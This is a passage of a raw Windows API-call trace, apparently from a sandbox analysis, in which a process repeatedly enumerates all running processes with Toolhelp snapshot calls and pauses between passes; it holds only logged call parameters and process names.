th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0135.258] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0135.259] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0135.260] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.260] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.261] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.262] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.262] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.263] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0135.264] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.264] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.265] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0135.266] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.267] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0135.268] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0135.270] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0135.271] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0135.272] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.273] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0135.274] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0135.275] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0135.276] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0135.306] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0135.307] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0135.308] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0135.309] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0135.310] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0135.311] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0135.313] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0135.314] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0135.315] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0135.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0135.317] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0135.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0135.320] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0135.321] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0135.322] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0135.323] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0135.324] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0135.325] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.327] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0135.328] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0135.329] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0135.331] CloseHandle (hObject=0xbc) returned 1 [0135.331] Sleep (dwMilliseconds=0x12c) [0135.660] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0135.665] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.666] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0135.667] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0135.667] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0135.668] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0135.669] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0135.669] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0135.670] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0135.671] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0135.672] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0135.673] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.673] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.674] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.675] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.675] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.676] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0135.677] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.677] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.678] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0135.679] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.681] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0135.682] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0135.684] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0135.685] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0135.686] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.687] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0135.688] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0135.689] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0135.690] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0135.692] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0135.693] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0135.694] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0135.695] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0135.697] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0135.698] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0135.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0135.701] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0135.702] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0135.703] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0135.704] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 